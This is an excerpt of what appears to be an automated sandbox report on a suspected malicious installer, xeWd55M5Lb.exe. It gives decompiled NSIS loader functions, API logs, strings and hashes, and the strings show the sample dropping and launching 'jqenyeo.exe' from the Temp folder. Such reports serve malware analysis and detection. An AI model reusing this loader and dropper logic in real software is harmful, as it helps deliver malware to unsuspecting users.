						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403da7
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D31

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,?,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7620FAA0), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,?,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,00000000,?), ref: 00403E36
LoadImageW.USER32 ref: 00403E7F
RegisterClassW.USER32 ref: 00403EBC
SystemParametersInfoW.USER32 ref: 00403ED4
CreateWindowExW.USER32 ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32 ref: 00403F6B
GetClassInfoW.USER32 ref: 00403F78
RegisterClassW.USER32 ref: 00403F81
DialogBoxParamW.USER32 ref: 00403FA0

Strings

.exe, xrefs: 00403E25
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
.DEFAULT\Control Panel\International, xrefs: 00403D83
C:\Users\user\AppData\Local\Temp, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
RichEd32, xrefs: 00403F53
1033, xrefs: 00403D37, 00403D93
H7B, xrefs: 00403D43
RichEd20, xrefs: 00403F45
RichEdit, xrefs: 00403F72
RichEdit20W, xrefs: 00403F63, 00403F69
_Nb, xrefs: 00403E9B, 00403F03
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-1630153654
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x436800, L"C:\\Users\\hardz\\Desktop\\xeWd55M5Lb.exe");
				E00406668(0x439000, E00405F83(0x436800));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x00403251
0x00000000
0x00000000
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x00403320
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x00403357
0x00403363
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x00403274
0x00000000
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x0040317a
0x0040317c
0x0040317c
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x00403194
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031aa
0x004031d0
0x004031df
0x004031e5
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031fa
0x00403202
0x00403205
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x00000000
0x00000000
0x00000000
0x004031fa
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403241
0x00000000
0x00403241

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xeWd55M5Lb.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\xeWd55M5Lb.exe,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

soft, xrefs: 004031BE
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
C:\Users\user\Desktop\xeWd55M5Lb.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
Null, xrefs: 004031C7
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
Error launching installer, xrefs: 00403120
Inst, xrefs: 004031B5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xeWd55M5Lb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1576854027
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00000000,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
API String ID: 1941528284-453250099
Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Strings

%s%S.dll, xrefs: 00406A11
UXTHEME, xrefs: 004069CE
\, xrefs: 004069ED

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
